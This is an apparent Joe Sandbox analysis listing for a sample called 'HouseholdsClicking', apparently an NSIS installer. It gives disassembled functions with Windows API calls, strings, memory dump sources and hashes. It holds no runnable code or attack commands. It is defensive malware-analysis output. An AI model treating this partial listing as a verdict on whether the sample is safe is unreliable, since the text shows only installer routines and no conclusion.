CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

SeShutdownPrivilege, xrefs: 00403C42
/D=, xrefs: 004039D2
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
Error launching installer, xrefs: 00403AA9
NCRC, xrefs: 004039A8
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Call: %d, xrefs: 0040165A
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename failed: %s, xrefs: 0040194B
Rename on reboot: %s, xrefs: 00401943
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
SetFileAttributes failed., xrefs: 004017A1
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: "%s" (%d), xrefs: 004017BF
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Jump: %d, xrefs: 00401602
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename: %s, xrefs: 004018F8
detailprint: %s, xrefs: 00401679

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd20, xrefs: 00405BC9
RichEdit, xrefs: 00405BF0
_Nb, xrefs: 00405AFD
RichEd32, xrefs: 00405BD4
.exe, xrefs: 00405A69
@jG, xrefs: 00405AF2
"F, xrefs: 00405A4B
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,TournamentsDefenceBerry,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,TournamentsDefenceBerry,TournamentsDefenceBerry,00000000,00000000,TournamentsDefenceBerry,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
TournamentsDefenceBerry, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TournamentsDefenceBerry
API String ID: 4286501637-2571119049
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00426979,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

y)B, xrefs: 00403458, 0040346A
yiB, xrefs: 0040346F, 0040348A, 00403513
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$y)B$yiB
API String ID: 651206458-3313267460
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Inst, xrefs: 00403698
soft, xrefs: 004036A1

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

